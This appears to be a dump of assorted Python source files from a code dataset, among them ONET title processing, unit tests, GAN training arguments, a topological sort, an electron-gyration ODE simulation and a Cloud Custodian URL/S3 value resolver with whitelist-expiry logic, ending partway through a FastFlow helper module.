id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
203312 | """Process ONET job titles into a common format"""
import pandas as pd
from skills_ml.algorithms.nlp import transforms, lowercase_strip_punc
class Onet_Title(object):
    """Job title data pulled from several ONET source files.

    Exposes three source descriptors (``occupation``, ``alternative``,
    ``sample``), each pairing an unpathed ONET filename with the columns
    to read from it, plus :meth:`extract` to load one of them.
    """

    def __init__(self, onet_cache):
        """
        Args:
            onet_cache: an object that is able to fetch ONET files by name
        """
        self.onet_cache = onet_cache
        # Each descriptor: ONET filename + the columns of interest.
        self.occupation = {
            'name': 'Occupation Data.txt',
            'fields': ['O*NET-SOC Code', 'Title'],
        }
        self.alternative = {
            'name': 'Alternate Titles.txt',
            'fields': ['O*NET-SOC Code', 'Alternate Title'],
        }
        self.sample = {
            'name': 'Sample of Reported Titles.txt',
            'fields': ['O*NET-SOC Code', 'Reported Job Title'],
        }

    def extract(self, name, columns):
        """Load a tab-delimited ONET file and keep only ``columns``.

        Args:
            name: unpathed filename of an ONET file ('Occupation Data.txt')
            columns: a list of columns to extract from the file

        Returns:
            pandas.DataFrame restricted to the requested columns
        """
        with self.onet_cache.ensure_file(name) as full_path:
            frame = pd.read_csv(full_path, delimiter='\t')
        return frame[columns]
class OnetTitleExtractor(object):
    """
    An object that creates a job titles CSV based on ONET data
    """
    def __init__(self, output_filename, onet_source, hash_function):
        """
        Args:
            output_filename: A filename to write the final dataset
            onet_source: An object that is able to fetch ONET files by name
            hash_function: A function that can hash a given string
        """
        self.output_filename = output_filename
        self.onet_source = onet_source
        self.hash_function = hash_function

    def run(self):
        """
        Creates a job titles CSV based on ONET occupation and title data
        """
        titles = Onet_Title(self.onet_source)
        # TODO: Get descriptions, original title
        # Pull the three title sources; each yields (O*NET-SOC Code, title).
        onet_titles = titles.extract(titles.occupation['name'],
                                     titles.occupation['fields'])
        alternative_titles = titles.extract(titles.alternative['name'],
                                            titles.alternative['fields'])
        sample_titles = titles.extract(titles.sample['name'],
                                       titles.sample['fields'])
        # Align column names across sources so the frames can be stacked.
        alternative_titles.columns = onet_titles.columns
        sample_titles.columns = onet_titles.columns
        job_titles = pd.concat(
            (onet_titles, alternative_titles, sample_titles)
        )
        # One row per occupation: canonical title plus description.
        unique_titles = titles.extract(
            titles.occupation['name'],
            titles.occupation['fields'] + ['Description']
        ).drop_duplicates()
        unique_titles.columns = [
            'O*NET-SOC Code',
            'Original Title',
            'Description'
        ]
        # Stable per-title id derived via the injected hash function.
        unique_titles['job_uuid'] = unique_titles['Original Title']\
            .apply(self.hash_function)
        # Left-join so every title row keeps its occupation metadata.
        titles_complete = pd.merge(job_titles,
                                   unique_titles,
                                   how='left',
                                   on=['O*NET-SOC Code'])
        # NOTE(review): transforms[0] is an opaque column key imported from
        # skills_ml.algorithms.nlp — confirm it names the cleaned-title column.
        titles_complete[transforms[0]] = titles_complete['Title']\
            .apply(lowercase_strip_punc)
        titles_complete.to_csv(self.output_filename, sep='\t')
| StarcoderdataPython |
11243017 | <filename>tests/config/should_ignore_ext.py
print('Should not get loaded by figura!')


# functions in figura files are supposed to raise an error ("Config construct of unsupported type")
def should_not_get_loaded():
    """Fixture function; figura is expected to reject this module."""
    pass
| StarcoderdataPython |
3506075 | import unittest
from unittest.mock import Mock, patch
from nuplan.common.actor_state.scene_object import SceneObject, SceneObjectMetadata
class TestSceneObject(unittest.TestCase):
    """Tests SceneObject class"""

    @patch("nuplan.common.actor_state.tracked_objects_types.TrackedObjectType")
    @patch("nuplan.common.actor_state.oriented_box.OrientedBox")
    def test_initialization(self, mock_box: Mock, mock_tracked_object_type: Mock) -> None:
        """Tests that agents can be initialized correctly"""
        # Metadata args: presumably (timestamp_us, token, track_id,
        # track_token) — confirm against SceneObjectMetadata's definition.
        scene_object = SceneObject(mock_tracked_object_type, mock_box, SceneObjectMetadata(1, "123", 1, "456"))
        self.assertEqual("123", scene_object.token)
        self.assertEqual("456", scene_object.track_token)
        self.assertEqual(mock_box, scene_object.box)
        self.assertEqual(mock_tracked_object_type, scene_object.tracked_object_type)

    @patch("nuplan.common.actor_state.scene_object.StateSE2")
    @patch("nuplan.common.actor_state.scene_object.OrientedBox")
    @patch("nuplan.common.actor_state.scene_object.TrackedObjectType")
    @patch("nuplan.common.actor_state.scene_object.SceneObject.__init__")
    def test_construction(self, mock_init: Mock, mock_type: Mock, mock_box_object: Mock, mock_state: Mock) -> None:
        """Test that agents can be constructed correctly."""
        # __init__ is patched out so only the constructor wiring is checked.
        mock_init.return_value = None
        mock_box = Mock()
        mock_box_object.return_value = mock_box
        _ = SceneObject.from_raw_params("123", "123", 1, 1, mock_state, size=(3, 2, 1))
        mock_box_object.assert_called_with(mock_state, width=3, length=2, height=1)
        # NOTE(review): the "<PASSWORD>" strings below look like dataset
        # anonymization artifacts; the original assertion presumably used the
        # "123" tokens passed to from_raw_params above — verify upstream.
        mock_init.assert_called_with(
            metadata=SceneObjectMetadata(token="<PASSWORD>", track_token="<PASSWORD>", timestamp_us=1, track_id=1),
            tracked_object_type=mock_type.GENERIC_OBJECT,
            oriented_box=mock_box,
        )


if __name__ == '__main__':
    unittest.main()
| StarcoderdataPython |
5100523 | import argparse
def _str2bool(value):
    """argparse-friendly boolean converter.

    ``type=bool`` is broken for CLI flags: ``bool('False')`` is True, so a
    boolean option could never be turned off from the command line. This
    converter accepts the usual true/false spellings instead.
    """
    if isinstance(value, bool):
        return value
    if value.lower() in ('yes', 'true', 't', 'y', '1'):
        return True
    if value.lower() in ('no', 'false', 'f', 'n', '0'):
        return False
    raise argparse.ArgumentTypeError('Boolean value expected, got %r' % value)


def parse_arguments(*args):
    """Build and parse the training command-line options.

    Args:
        *args: forwarded to ``ArgumentParser.parse_args`` — pass a list of
            CLI tokens (e.g. in tests), or nothing to read ``sys.argv``.

    Returns:
        argparse.Namespace with all parsed options.
    """
    parser = argparse.ArgumentParser()
    ###############added options#######################################
    parser.add_argument('-lr', '--learning_rate', default=1e-3, type=float,
                        help='Learning rate for the generator')
    parser.add_argument('-lrd', '--learning_rate_D', default=1e-4, type=float,
                        help='Learning rate for the discriminator')
    parser.add_argument('-lrd_l', '--learning_rate_D_local', default=1e-4, type=float,
                        help='Learning rate for the discriminator')
    parser.add_argument('--gan', default='lsgan', type=str, choices=['dcgan', 'lsgan', 'wgan', 'improved wgan'],
                        help='dcgan|lsgan|wgan|improved wgan')  # todo wgan/improved wgan
    parser.add_argument('--model', default='scribbler', type=str,
                        choices=['scribbler', 'texturegan', 'pix2pix', 'scribbler_dilate_128'],
                        help='scribbler|pix2pix')
    parser.add_argument('--num_epoch', default=100, type=int,
                        help='texture|scribbler')
    parser.add_argument('--visualize_every', default=10, type=int,
                        help='no. iteration to visualize the results')
    # all the weights ratio, might wanna make them sum to one
    parser.add_argument('--feature_weight', default=0, type=float,
                        help='weight ratio for feature loss')
    parser.add_argument('--global_pixel_weight_l', default=0, type=float,
                        help='weight ratio for pixel loss for l channel')
    parser.add_argument('--local_pixel_weight_l', default=1, type=float,
                        help='pixel weight for local loss patch')
    parser.add_argument('--pixel_weight_ab', default=0, type=float,
                        help='weight ratio for pixel loss for ab channel')
    parser.add_argument('--pixel_weight_rgb', default=0, type=float,
                        help='weight ratio for pixel loss for ab channel')
    parser.add_argument('--discriminator_weight', default=0, type=float,
                        help='weight ratio for the discriminator loss')
    parser.add_argument('--discriminator_local_weight', default=0, type=float,
                        help='weight ratio for the discriminator loss')
    parser.add_argument('--style_weight', default=0, type=float,
                        help='weight ratio for the texture loss')
    # parser.add_argument('--gpu', default=[0], type=int, nargs='+',
    #                     help='List of GPU IDs to use') # TODO support cpu
    parser.add_argument('--gpu', default=1, type=int, help="GPU ID")
    parser.add_argument('--display_port', default=7779, type=int,
                        help='port for displaying on visdom (need to match with visdom currently open port)')
    parser.add_argument('--data_path', default='/home/psangkloy3/training_handbags_pretrain/', type=str,
                        help='path to the data directory, expect train_skg, train_img, val_skg, val_img')
    parser.add_argument('--save_dir', default='/home/psangkloy3/test/', type=str,
                        help='path to save the model')
    parser.add_argument('--load_dir', default='/home/psangkloy3/test/', type=str,
                        help='path to save the model')
    parser.add_argument('--save_every', default=1000, type=int,
                        help='no. iteration to save the models')
    parser.add_argument('--load_epoch', default=-1, type=int,
                        help="The epoch number for the model to load")
    parser.add_argument('--load', default=-1, type=int,
                        help='load generator and discrminator from iteration n')
    parser.add_argument('--load_D', default=-1, type=int,
                        help='load discriminator from iteration n, priority over load')
    parser.add_argument('--image_size', default=128, type=int,
                        help='Training images size, after cropping')
    parser.add_argument('--resize_to', default=300, type=int,
                        help='Training images size, after cropping')
    parser.add_argument('--resize_max', default=1, type=float,
                        help='max resize, ratio of the original image, max value is 1')
    parser.add_argument('--resize_min', default=0.6, type=float,
                        help='min resize, ratio of the original image, min value 0')
    parser.add_argument('--patch_size_min', default=20, type=int,
                        help='minumum texture patch size')
    parser.add_argument('--patch_size_max', default=40, type=int,
                        help='max texture patch size')
    parser.add_argument('--batch_size', default=32, type=int, help="Training batch size. MUST BE EVEN NUMBER")
    parser.add_argument('--num_input_texture_patch', default=2, type=int)
    parser.add_argument('--num_local_texture_patch', default=1, type=int)
    parser.add_argument('--color_space', default='lab', type=str, choices=['lab', 'rgb'],
                        help='lab|rgb')
    # Fixed: was type=int with a float default, so any value passed on the
    # CLI (e.g. '0.9') raised an argparse error.
    parser.add_argument('--threshold_D_max', default=0.8, type=float,
                        help='stop updating D when accuracy is over max')
    parser.add_argument('--content_layers', default='relu4_2', type=str,
                        help='Layer to attach content loss.')
    parser.add_argument('--style_layers', default='relu3_2, relu4_2', type=str,
                        help='Layer to attach content loss.')
    # Fixed: boolean options below used type=bool, under which every
    # non-empty string (including 'False') parsed as True.
    parser.add_argument('--use_segmentation_patch', default=True, type=_str2bool,
                        help='whether or not to inject noise into the network')
    parser.add_argument('--input_texture_patch', default='dtd_texture', type=str,
                        choices=['original_image', 'dtd_texture'],
                        help='whether or not to inject noise into the network')
    parser.add_argument('--loss_texture', default='dtd_texture', type=str,
                        choices=['original_image', 'dtd_texture'],
                        help='where is the texture loss come from')
    parser.add_argument('--local_texture_size', default=50, type=int,
                        help='use local texture loss instead of global, set -1 to use global')
    parser.add_argument('--texture_discrminator_loss', default=True, type=_str2bool,
                        help='adding discrminator for texture')
    ############################################################################
    ############################################################################
    ############Not Currently Using #################################################################
    parser.add_argument('--tv_weight', default=1, type=float,
                        help='weight ratio for total variation loss')
    parser.add_argument('--mode', default='texture', type=str, choices=['texture', 'scribbler'],
                        help='texture|scribbler')
    parser.add_argument('--visualize_mode', default='train', type=str, choices=['train', 'test'],
                        help='train|test')
    parser.add_argument('--crop', default='random', type=str, choices=['random', 'center'],
                        help='random|center')
    parser.add_argument('--contrast', default=True, type=_str2bool,
                        help='randomly adjusting contrast on sketch')
    parser.add_argument('--occlude', default=False, type=_str2bool,
                        help='randomly occlude part of the sketch')
    parser.add_argument('--checkpoints_path', default='data/', type=str,
                        help='output directory for results and models')
    parser.add_argument('--noise_gen', default=False, type=_str2bool,
                        help='whether or not to inject noise into the network')
    parser.add_argument('--absolute_load', default='', type=str,
                        help='load saved generator model from absolute location')
    ##################################################################################################################################
    return parser.parse_args(*args)
| StarcoderdataPython |
def dfs(adjacency_list, current_vertex, visited, result_stack):
    """Depth-first traversal; appends vertices to result_stack in post-order."""
    visited[current_vertex] = True
    for neighbour in adjacency_list[current_vertex]:
        if visited[neighbour]:
            continue
        dfs(adjacency_list, neighbour, visited, result_stack)
    result_stack.append(current_vertex)


# this algo works on directed acyclic graphs i.e DAGs
def topo_sort(adjacency_list, no_of_vertices):
    """Return one topological ordering of the DAG given as an adjacency list."""
    seen = [False] * no_of_vertices
    finish_order = []
    for vertex in range(no_of_vertices):
        if not seen[vertex]:
            dfs(adjacency_list, vertex, seen, finish_order)
    # Reversing the post-order finish sequence yields a topological order.
    return finish_order[::-1]
# Driver: read the graph from stdin and print one topological ordering.
adjacency_list = []
no_of_vertices = int(input())
for i in range(no_of_vertices):
    # Each subsequent line lists the neighbours of vertex i.
    adjacency_list.append([int(v) for v in input().split()])
result = topo_sort(adjacency_list, no_of_vertices)
print(result)
# Sample input below (vertex count, then adjacency rows).
# NOTE(review): the sample claims 6 vertices but lists fewer adjacency
# rows than the reader above expects — verify.
"""
6
3
1
0 1
0 2
"""
4957488 |
from typing import cast
from logging import Logger
from logging import getLogger
from unittest import TestSuite
from unittest import main as unitTestMain
from tests.TestBase import TestBase
# import the class you want to test here
from metamenus.Configuration import Configuration
class TestConfiguration(TestBase):
    """Unit tests for the metamenus Configuration defaults."""
    # Class-wide logger, initialized once in setUpClass.
    clsLogger: Logger = cast(Logger, None)

    @classmethod
    def setUpClass(cls):
        TestBase.setUpLogging()
        TestConfiguration.clsLogger = getLogger(__name__)

    @classmethod
    def tearDownClass(cls):
        pass

    def setUp(self):
        # Fresh Configuration per test so defaults are unmodified.
        self.logger: Logger = TestConfiguration.clsLogger
        self._configuration: Configuration = Configuration()

    def tearDown(self):
        pass

    def testDefaultIndentation(self):
        expectedIndentation: str = Configuration.DEFAULT_INDENTATION
        actualIndentation: str = self._configuration.indentation
        self.assertEqual(expectedIndentation, actualIndentation, 'Default indentation has changed')

    def testDefaultMenuBarPrefix(self):
        expectedPrefix: str = Configuration.DEFAULT_MENU_BAR_PREFIX
        actualPrefix: str = self._configuration.menuBarPrefix
        self.assertEqual(expectedPrefix, actualPrefix, 'Default menu bar method prefix has changed')

    def testDefaultMenuPrefix(self):
        expectedPrefix: str = Configuration.DEFAULT_MENU_PREFIX
        actualPrefix: str = self._configuration.menuPrefix
        self.assertEqual(expectedPrefix, actualPrefix, 'Default menu method prefix has changed')

    def testDefaultVerboseWarnings(self):
        expectedValue: bool = Configuration.DEFAULT_VERBOSE_WARNINGS
        actualValue: bool = self._configuration.verboseWarnings
        self.assertEqual(expectedValue, actualValue, 'Verbosity default has changed')
def suite() -> TestSuite:
    """You need to change the name of the test class here also."""
    import unittest

    testSuite: TestSuite = TestSuite()
    # noinspection PyUnresolvedReferences
    # NOTE(review): unittest.makeSuite is deprecated (removed in Python
    # 3.13); TestLoader().loadTestsFromTestCase is the modern replacement.
    testSuite.addTest(unittest.makeSuite(TestConfiguration))
    return testSuite


if __name__ == '__main__':
    unitTestMain()
| StarcoderdataPython |
1625467 | <gh_stars>1-10
import ode
import numpy as np
import matplotlib.pyplot as plt
# Physical constants (SI units).
qe = 1.60217662e-19   # elementary charge [C]
me = 9.10938356e-31   # electron mass [kg]
B0 = 0.1              # magnetic field magnitude [T]


# RHS of the ODE problem, dy/dt = f(t, y)
def fun(t, y):
    """Newton-Lorentz right-hand side for an electron in a uniform Bz field.

    Args:
        t: time (unused; the fields are static)
        y: state vector (x, y, z, vx, vy, vz)

    Returns:
        numpy array (vx, vy, vz, ax, ay, az)
    """
    vx, vy, vz = y[3], y[4], y[5]

    # Charge-to-mass ratio (q/m) for an electron
    qm = -qe / me

    # Static, uniform fields: E = 0 [V/m], B = (0, 0, B0) [T]
    Ex = Ey = Ez = 0.0
    Bx = By = 0.0
    Bz = B0

    # Newton-Lorentz equation (in Cartesian coordinates): a = q/m (E + v x B)
    ax = qm * Ex + qm * (Bz * vy - By * vz)
    ay = qm * Ey + qm * (Bx * vz - Bz * vx)
    az = qm * Ez + qm * (By * vx - Bx * vy)
    return np.array((vx, vy, vz, ax, ay, az))
def main():
    """Integrate 100 electron Larmor gyrations with RK4 and plot the
    trajectory plus the percent error of the orbit radius."""
    # Initial velocity [m/s]
    vy0 = 1.0e6
    # Larmor pulsation [rad/s]
    w_L = qe/me * B0
    # Larmor period [s]
    tau_L = 2.0*np.pi/w_L
    # Larmor radius [m]
    r_L = vy0/w_L
    # Initial conditions: start at (r_L, 0, 0), velocity along +y.
    y0 = np.array(( r_L, 0.0, 0.0, 0.0, vy0, 0.0 ))
    # Time Grid
    N_gyroperiods = 100
    N_points_per_gyroperiod = 10
    time_rk = np.linspace( 0.0, N_gyroperiods*tau_L, N_gyroperiods*N_points_per_gyroperiod )
    # Runge-Kutta 4
    y_rk = ode.rk4( fun, time_rk, y0 )
    # Amplitude (orbit radius) recovered from the integrated positions
    r_rk = np.sqrt( y_rk[:,0]**2 + y_rk[:,1]**2 )
    # Plot 1 - Trajectory, normalized by the analytic Larmor radius
    plt.figure(1)
    plt.plot( y_rk[:,0]/r_L, y_rk[:,1]/r_L, 'b-', label='Runge-Kutta (4th)' )
    plt.axis('equal')
    plt.xlabel('x [r_L]')
    plt.ylabel('y [r_L]')
    plt.title(str(N_gyroperiods)+' Larmor Gyrations, '+str(N_points_per_gyroperiod)+' points/gyroperiod')
    plt.legend(loc=3)
    plt.savefig('ex04_ode_larmor_long_trajectory.png')
    # Plot 2 - Amplitude percent error against the exact radius r_L
    plt.figure(2)
    plt.plot( time_rk/tau_L, ode.error_percent( r_L, r_rk), 'bx', label='Runge-Kutta (4th)' )
    plt.xlabel('time / tau_Larmor')
    plt.ylabel('Percent Amplitude error [%]')
    plt.title('Percent Amplitude Error over '+str(N_gyroperiods)+' Larmor gyrations')
    plt.legend(loc=2)
    plt.savefig('ex04_ode_larmor_long_error.png')
    plt.show()


if __name__ == '__main__':
    main()
| StarcoderdataPython |
255901 | <filename>python/week1/euro.py
# Euro coin denominations, in euros, ordered to match QUESTIONS below.
PRICES = [0.01, 0.02, 0.05, 0.10, 0.20, 0.50, 1, 2]
# One Dutch prompt per denomination ("enter the number of X coins/euros").
QUESTIONS = [
    "Voer het aantal 1 centen in:\n",
    "Voer het aantal 2 centen in: \n",
    "Voer het aantal 5 centen in: \n",
    "Voer het aantal 10 centen in: \n",
    "Voer het aantal 20 centen in: \n",
    "Voer het aantal 50 centen in: \n",
    "Voer het aantal 1 euro's in: \n",
    "Voer het aantal 2 euro's in: \n"
]

if __name__ == '__main__':
    # Ask for a count of each coin type, in the same order as PRICES.
    munten = [int(input(question)) for question in QUESTIONS]
    aantal_munten = sum(munten)
    # NOTE(review): binary floating point (0.01, 0.02, ...) can print
    # rounding artifacts; counting in integer cents would be exact.
    totale_waarde = sum(quantity * value for (quantity, value) in zip(munten, PRICES))
    print("Totaal aantal munten: {}".format(aantal_munten))
    print("Totale waarde van de munten: {} euro".format(totale_waarde))
# Read a product's price and compute it with a 5% discount.
preco = float(input("Digite o valor do produto: R$"));
# 5% of the original price.
desc = (preco/100) * 5;
novopreco = preco - desc;
# Installment ("a prazo") price with an 8% surcharge.
prazo= preco + (preco/100*8);
print(f"O produto custava R${preco:.2f}, agora com desconto passou a custar R${novopreco:.2f}.");
print(f"Já à prazo, o valor do produto passa a ser R${prazo:.2f}.");
| StarcoderdataPython |
1689753 | <filename>c7n/resolver.py
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
import csv
import io
import itertools
import json
import logging
import os
import zlib
from contextlib import closing
from urllib.parse import parse_qsl, urlparse
from urllib.request import Request, urlopen

import jmespath

from c7n.utils import format_string_values
log = logging.getLogger('custodian.resolver')
# MAX_WBITS | 32 tells zlib to auto-detect a zlib or gzip header.
ZIP_OR_GZIP_HEADER_DETECT = zlib.MAX_WBITS | 32


class URIResolver:
    """Fetch the text contents of a URI (s3:// or urllib-supported), with
    optional caching keyed on the URI."""

    def __init__(self, session_factory, cache):
        self.session_factory = session_factory
        self.cache = cache

    def resolve(self, uri):
        """Return the decoded body at ``uri``, consulting the cache first."""
        cache_key = ("uri-resolver", uri)
        if self.cache:
            cached = self.cache.get(cache_key)
            if cached is not None:
                return cached
        if uri.startswith('s3://'):
            contents = self.get_s3_uri(uri)
        else:
            # TODO: in the case of file: content and untrusted
            # third parties, uri would need sanitization
            request = Request(uri, headers={"Accept-Encoding": "gzip"})
            with closing(urlopen(request)) as response:
                contents = self.handle_response_encoding(response)
        if self.cache:
            self.cache.save(cache_key, contents)
        return contents

    def handle_response_encoding(self, response):
        """Decode a urllib response body, transparently un-gzipping it."""
        if response.info().get('Content-Encoding') != 'gzip':
            return response.read().decode('utf-8')
        return zlib.decompress(
            response.read(), ZIP_OR_GZIP_HEADER_DETECT).decode('utf8')

    def get_s3_uri(self, uri):
        """Fetch an s3://bucket/key[?versionId=...] object body as text."""
        parsed = urlparse(uri)
        client = self.session_factory().client('s3')
        params = dict(Bucket=parsed.netloc, Key=parsed.path[1:])
        if parsed.query:
            # Query string carries extra get_object params (e.g. versionId).
            params.update(dict(parse_qsl(parsed.query)))
        body = client.get_object(**params)['Body'].read()
        return body if isinstance(body, str) else body.decode('utf-8')
class ValuesFrom:
    """Retrieve values from a url.

    Supports json, csv and line delimited text files and expressions
    to retrieve a subset of values.

    Expression syntax
    - on json, a jmespath expr is evaluated
    - on csv, an integer column or jmespath expr can be specified
    - on csv2dict, a jmespath expr (the csv is parsed into a dictionary where
      the keys are the headers and the values are the remaining columns)

    Text files are expected to be line delimited values.

    Examples::

        value_from:
            url: s3://bucket/xyz/foo.json
            expr: [].AppId

        value_from:
            url: http://foobar.com/mydata
            format: json
            expr: Region."us-east-1"[].ImageId

        value_from:
            url: s3://bucket/abc/foo.csv
            format: csv2dict
            expr: key[1]

        # inferred from extension
        format: [json, csv, csv2dict, txt]
    """
    supported_formats = ('json', 'txt', 'csv', 'csv2dict')

    # intent is that callers embed this schema
    schema = {
        'type': 'object',
        'additionalProperties': 'False',
        'required': ['url'],
        'properties': {
            'url': {'type': 'string'},
            'format': {'enum': ['csv', 'json', 'txt', 'csv2dict']},
            'expr': {'oneOf': [
                {'type': 'integer'},
                {'type': 'string'}]}
        }
    }

    def __init__(self, data, manager, event=None, value=None):
        # Interpolate {account_id}/{region} placeholders in the config block.
        config_args = {
            'account_id': manager.config.account_id,
            'region': manager.config.region
        }
        self.data = format_string_values(data, **config_args)
        self.manager = manager
        # Lambda event used for str.format substitution into 'expr'.
        self.event = event
        # Candidate value being filtered; returned when a whitelist entry is "*".
        self.value = value
        self.cache = manager._cache
        self.resolver = URIResolver(manager.session_factory, manager._cache)

    def get_contents(self):
        """Fetch the url's body and determine its format.

        The format comes from the explicit 'format' key when present,
        otherwise from the url's file extension.
        """
        _, format = os.path.splitext(self.data['url'])
        if not format or self.data.get('format'):
            format = self.data.get('format', '')
        else:
            # Drop the leading '.' of the extension.
            format = format[1:]
        if format not in self.supported_formats:
            # NOTE(review): ValueError is given logging-style arguments, so
            # the %s placeholders are never interpolated into the message.
            raise ValueError(
                "Unsupported format %s for url %s",
                format, self.data['url'])
        contents = str(self.resolver.resolve(self.data['url']))
        return contents, format

    def get_values(self):
        """Return the resolved value set, memoized via the manager cache."""
        if self.cache:
            # use these values as a key to cache the result so if we have
            # the same filter happening across many resources, we can reuse
            # the results.
            key = [self.data.get(i) for i in ('url', 'format', 'expr')]
            contents = self.cache.get(("value-from", key))
            if contents is not None:
                return contents
        contents = self._get_values()
        if self.cache:
            self.cache.save(("value-from", key), contents)
        return contents

    def _get_values(self):
        """Parse the fetched contents per format and apply 'expr'.

        The json branch additionally implements a whitelisting scheme: the
        jmespath result may be a dict with 'value' and 'validUntil' (epoch
        seconds); expired entries resolve to None and a value of "*" resolves
        to self.value.
        """
        contents, format = self.get_contents()
        if format == 'json':
            data = json.loads(contents)
            if 'expr' in self.data:
                expr = None
                # this event is the event passed into the lambda. Slightly different than the CloudTrail event.
                if self.event:
                    try:
                        try:
                            # Remove the account portion from the arn
                            self.event['detail']['userIdentity']['arn'] = self.event['detail']['userIdentity']['arn'].split(':')[5]
                        except Exception as e:
                            # Failed to simplify the arn so keep it
                            # This might happen on the second or later iterations
                            log.debug(f"Failed to parse arn: {self.event['detail']['userIdentity']['arn']}")
                            pass
                        expr = self.data['expr'].format(**self.event)
                        log.debug(f"Expression after substitution: {expr}")
                    except KeyError as e:
                        log.error(f"Failed substituting into expression: {str(e)}")
                        expr = self.data['expr']
                else:
                    expr = self.data['expr']
                res = jmespath.search(expr, data)
                log.debug(f"JMESPath result: {res}")
                # Checking for whitelist expiration
                if res is not None:
                    valid_until = res.get('validUntil', None)
                    value = res.get('value', None)
                    # If value AND valid_until are both not None, then we assume this is whitelisting
                    # However, if only one of them returns, we assume this isn't whitelisting and return
                    # the value. This allows for other jmespath expressions to be used besides just
                    # for whitelisting. Hopefully future proofing this part.
                    if value is None or valid_until is None or value == "" or valid_until == "":
                        log.warning(f"Value is: {value}, ValidUntil is: {valid_until}")
                        log.debug("Returning res since this might not be whitelisting...")
                        return res
                    else:
                        # If we made it here, we assume we are wanting to do whitelisting and need
                        # to check the expiration time to see if it's valid
                        import datetime
                        import time
                        current_time = datetime.datetime.fromtimestamp(time.time())
                        expiration = datetime.datetime.fromtimestamp(int(valid_until))
                        log.debug(f"Current Time: {current_time}, Expiration: {expiration}")
                        if current_time > expiration:
                            log.warning(f"Whitelist has expired, returning None...")
                            return None
                        else:
                            log.debug("Whitelist is valid")
                        if value == "*":
                            # Wildcard whitelist entry matches the filtered value.
                            log.debug(f"Value is *... Returning value: {self.value}")
                            return self.value
                        return value
                else:
                    log.warning(f"ValueFrom filter: {expr} key returned None")
                    return res
        elif format == 'csv' or format == 'csv2dict':
            data = csv.reader(io.StringIO(contents))
            if format == 'csv2dict':
                # Transpose rows into {header: [remaining column values]}.
                data = {x[0]: list(x[1:]) for x in zip(*data)}
                if 'expr' in self.data:
                    return self._get_resource_values(data)
                else:
                    combined_data = set(itertools.chain.from_iterable(data.values()))
                    return combined_data
            else:
                # Integer expr selects a single column by index.
                if isinstance(self.data.get('expr'), int):
                    return set([d[self.data['expr']] for d in data])
                data = list(data)
                if 'expr' in self.data:
                    if self.event:
                        try:
                            expr = self.data['expr'].format(**self.event)
                            log.debug('Expression after substitution: %s' % expr)
                        except KeyError as e:
                            log.error('Failed substituting into expression: %s' % str(e))
                            expr = self.data['expr']
                    else:
                        expr = self.data['expr']
                    # NOTE(review): _get_resource_values takes one argument;
                    # this two-argument call would raise TypeError at runtime
                    # — confirm the intended helper signature.
                    return self._get_resource_values(expr, data)
                else:
                    # NOTE(review): this branch runs when 'expr' is absent yet
                    # reads self.data['expr'] (KeyError). Upstream c7n returns
                    # the flattened row set here — verify intent. Nesting of
                    # this whole branch was reconstructed from unindented
                    # source; double-check against the original file.
                    expr = self.data['expr']
                    res = jmespath.search(expr, data)
                    if res is None:
                        log.warning('ValueFrom filter: %s key returned None' % self.data['expr'])
                        return res
                    else:
                        combined_data = set(itertools.chain.from_iterable(data))
                        return combined_data
        elif format == 'txt':
            # One value per line, stripped of surrounding whitespace.
            return set([s.strip() for s in io.StringIO(contents).readlines()])

    def _get_resource_values(self, data):
        """Evaluate self.data['expr'] against data; lists become sets."""
        res = jmespath.search(self.data['expr'], data)
        if res is None:
            log.warning(f"ValueFrom filter: {self.data['expr']} key returned None")
        if isinstance(res, list):
            res = set(res)
        return res
| StarcoderdataPython |
1636051 | <filename>mex11.py
#!/usr/bin/env python3.6 # used in Unix/Linux OS
import sys
def print_uniq_lines(file_list):
    """Print the union of lines found across the given open files.

    Args:
        file_list: iterable of readable file-like objects.

    Note: set semantics — duplicate lines are removed and the output order
    is arbitrary; each line keeps its own trailing newline.
    """
    # Removed leftover debug prints that polluted the program's output.
    all_lines = set()
    for f in file_list:
        all_lines |= set(f.readlines())
    print("".join(all_lines))
# With CLI arguments: treat each as a filename and merge their lines;
# otherwise read from standard input.
if len(sys.argv) > 1:
    # NOTE(review): these file handles are never closed; a with-statement
    # (or ExitStack) would be cleaner.
    print_uniq_lines(open(f) for f in sys.argv[1:])
else:
    print_uniq_lines([sys.stdin])  # stdin, stdout, stderr - These streams are regular text files like those returned by open().
# sys.stdin, sys.stdout, sys.stderr:
# https://docs.python.org/3/library/sys.html?highlight=stdin#sys.stdin
| StarcoderdataPython |
6488409 | <gh_stars>0
"""Helper functions to create backbone model."""
# Copyright (C) 2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions
# and limitations under the License.
import math
import FrEIA.framework as Ff
import FrEIA.modules as Fm
import torch
from FrEIA.framework.sequence_inn import SequenceINN
from torch import nn
def subnet_conv1(dims_in: int, dims_out: int):
    """1x1 conv subnetwork that predicts the affine coupling coefficients.

    Args:
        dims_in (int): input dimensions
        dims_out (int): output dimensions

    Returns:
        nn.Sequential: Feed-forward subnetwork
    """
    hidden_channels = 2 * dims_in
    layers = [
        nn.Conv2d(dims_in, hidden_channels, kernel_size=1),
        nn.ReLU(),
        nn.Conv2d(hidden_channels, dims_out, kernel_size=1),
    ]
    return nn.Sequential(*layers)
def subnet_conv3(dims_in: int, dims_out: int):
    """3x3 conv subnetwork that predicts the affine coupling coefficients.

    Padding of 1 keeps the spatial size unchanged.

    Args:
        dims_in (int): input dimensions
        dims_out (int): output dimensions

    Returns:
        nn.Sequential: Feed-forward subnetwork
    """
    hidden_channels = 2 * dims_in
    layers = [
        nn.Conv2d(dims_in, hidden_channels, kernel_size=3, padding=1),
        nn.ReLU(),
        nn.Conv2d(hidden_channels, dims_out, kernel_size=3, padding=1),
    ]
    return nn.Sequential(*layers)
def fastflow_head(condition_vector: int, coupling_blocks: int, clamp_alpha: float, n_features: int, dim) -> SequenceINN:
    """Create invertible decoder network.

    Args:
        condition_vector (int): length of the condition vector
            (NOTE(review): unused in this body — confirm intent)
        coupling_blocks (int): number of coupling blocks to build the decoder
        clamp_alpha (float): clamping value to avoid exploding values
        n_features (int): number of decoder features
        dim: spatial size of the (dim x dim) feature maps fed to the INN
            — presumably; confirm against callers

